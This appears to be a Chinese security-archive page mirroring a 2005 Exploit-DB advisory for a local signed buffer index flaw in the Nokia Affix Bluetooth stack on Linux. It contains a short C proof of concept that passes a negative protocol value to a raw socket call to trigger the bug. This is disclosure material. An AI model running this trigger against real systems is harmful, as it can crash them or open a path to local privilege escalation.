Affix Bluetooth Protocol Stack 3.1/3.2 – Signed Buffer Index (1)

Affix Bluetooth Protocol Stack 3.1/3.2 – Signed Buffer Index (1)

漏洞ID 1055055 漏洞类型
发布时间 2005-04-25 更新时间 2005-04-25
图片[1]-Affix Bluetooth Protocol Stack 3.1/3.2 – Signed Buffer Index (1)-安全小百科CVE编号 N/A
图片[2]-Affix Bluetooth Protocol Stack 3.1/3.2 – Signed Buffer Index (1)-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25525
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13347/info

A local signed buffer index vulnerability affects Affix Bluetooth Protocol Stack. This issue is due to a failure of the affected utility to properly handle user-supplied buffer size parameters.

This issue may be leveraged by a local attacker to gain escalated privileges on an affected computer. 

/*
        Nokia Affix Bluetooth Signed Buffer Index PoC
        - kf_lists[at]digitalmunition[dot]com
*/


#include <sys/socket.h>
#include <affix/bluetooth.h>
#include <affix/hci_cmds.h>
#include <affix/hci_types.h>

main()
{
       int ctl;


       if ((ctl = socket(PF_AFFIX, SOCK_RAW, -31337)) < 0)
       {
               perror("Something went wrong?");
               exit(1);
       }
}

相关推荐: Caldera X Server External Program Privileged Invocation Weakness

Caldera X Server External Program Privileged Invocation Weakness 漏洞ID 1101603 漏洞类型 Input Validation Error 发布时间 2002-08-27 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享